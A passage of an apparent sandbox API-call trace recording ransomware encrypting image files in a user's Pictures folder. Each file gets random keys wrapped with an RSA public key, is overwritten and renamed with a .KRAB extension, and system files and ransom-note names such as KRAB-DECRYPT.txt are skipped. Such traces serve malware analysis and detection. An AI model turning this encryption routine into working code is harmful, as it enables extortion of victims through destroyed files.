pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.809] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.809] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.810] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.810] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.810] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.810] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.810] GetLastError () returned 0x0 [0097.810] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.810] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.810] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011018) returned 1 [0097.811] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.811] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.811] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.811] GetLastError () returned 0x0 [0097.811] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.811] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0097.811] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ofoyenxpmltiqjhlesn_.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.812] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.812] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.812] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xf447, lpOverlapped=0x0) returned 1 [0097.823] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffff0bb9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.823] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xf447, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xf447, lpOverlapped=0x0) returned 1 [0097.823] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.824] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.826] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.827] CloseHandle (hObject=0x778) returned 1 [0097.827] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.827] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ofoyenxpmltiqjhlesn_.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ofoyenxpmltiqjhlesn_.png.krab")) returned 1 [0097.828] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.828] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.828] lstrcmpW (lpString1="R pvjcP.png", lpString2=".") returned 1 [0097.828] lstrcmpW (lpString1="R pvjcP.png", lpString2="..") returned 1 [0097.828] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="R pvjcP.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png" [0097.828] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.828] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png.KRAB") returned 76 [0097.828] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png") returned 71 [0097.828] lstrlenW (lpString=".png") returned 4 [0097.828] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.828] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.828] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.829] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png") returned 71 [0097.829] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png") returned 71 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="desktop.ini") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="autorun.inf") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="ntuser.dat") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="iconcache.db") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="bootsect.bak") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="boot.ini") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="ntuser.dat.log") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="thumbs.db") returned -1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="KRAB-DECRYPT.html") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="ntldr") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="NTDETECT.COM") returned 1 [0097.829] lstrcmpiW (lpString1="R pvjcP.png", lpString2="Bootfont.bin") returned 1 [0097.829] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.829] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011018) returned 1 [0097.830] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.830] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.830] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.830] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.830] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0097.830] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.831] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011458) returned 1 [0097.831] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.831] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.831] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.831] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.831] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0097.831] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.832] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011678) returned 1 [0097.832] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.832] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.832] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.832] GetLastError () returned 0x0 [0097.832] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.832] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.832] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.832] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.833] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.833] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.833] GetLastError () returned 0x0 [0097.833] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.833] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.833] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\r pvjcp.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.833] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.834] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.834] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x17284, lpOverlapped=0x0) returned 1 [0097.850] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffe8d7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.850] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x17284, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x17284, lpOverlapped=0x0) returned 1 [0097.850] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.850] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.854] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.854] CloseHandle (hObject=0x778) returned 1 [0097.854] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.855] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\r pvjcp.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\R pvjcP.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\r pvjcp.png.krab")) returned 1 [0097.855] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.856] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.856] lstrcmpW (lpString1="s3Mgfca_coGS9k5.png", lpString2=".") returned 1 [0097.856] lstrcmpW (lpString1="s3Mgfca_coGS9k5.png", lpString2="..") returned 1 [0097.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="s3Mgfca_coGS9k5.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png" [0097.856] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.856] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png.KRAB") returned 84 [0097.856] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png") returned 79 [0097.856] lstrlenW (lpString=".png") returned 4 [0097.856] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.856] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.856] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.857] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png") returned 79 [0097.857] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png") returned 79 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="desktop.ini") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="autorun.inf") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="ntuser.dat") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="iconcache.db") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="bootsect.bak") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="boot.ini") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="ntuser.dat.log") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="thumbs.db") returned -1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="KRAB-DECRYPT.html") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="ntldr") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="NTDETECT.COM") returned 1 [0097.857] lstrcmpiW (lpString1="s3Mgfca_coGS9k5.png", lpString2="Bootfont.bin") returned 1 [0097.857] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.857] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010f08) returned 1 [0097.858] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.858] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.858] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.858] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.859] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0097.859] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.859] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011238) returned 1 [0097.859] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.860] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.860] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.860] CryptGenRandom (in: hProv=0x1011238, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.860] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0097.860] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.860] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.861] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.861] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.861] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.861] GetLastError () returned 0x0 [0097.861] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.861] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.861] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.862] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.862] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.862] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.862] GetLastError () returned 0x0 [0097.862] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.862] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.862] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\s3mgfca_cogs9k5.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.863] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.863] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.863] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x15d37, lpOverlapped=0x0) returned 1 [0097.877] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffea2c9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.877] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15d37, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x15d37, lpOverlapped=0x0) returned 1 [0097.877] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.877] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.881] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.881] CloseHandle (hObject=0x778) returned 1 [0097.881] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.881] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\s3mgfca_cogs9k5.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\s3Mgfca_coGS9k5.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\s3mgfca_cogs9k5.png.krab")) returned 1 [0097.882] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.883] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.883] lstrcmpW (lpString1="tqAGKf0.jpg", lpString2=".") returned 1 [0097.883] lstrcmpW (lpString1="tqAGKf0.jpg", lpString2="..") returned 1 [0097.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="tqAGKf0.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg" [0097.883] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.883] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg.KRAB") returned 76 [0097.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg") returned 71 [0097.883] lstrlenW (lpString=".jpg") returned 4 [0097.883] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.883] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0097.883] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg") returned 71 [0097.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg") returned 71 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="desktop.ini") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="autorun.inf") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="ntuser.dat") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="iconcache.db") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="bootsect.bak") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="boot.ini") returned 1 [0097.884] lstrcmpiW 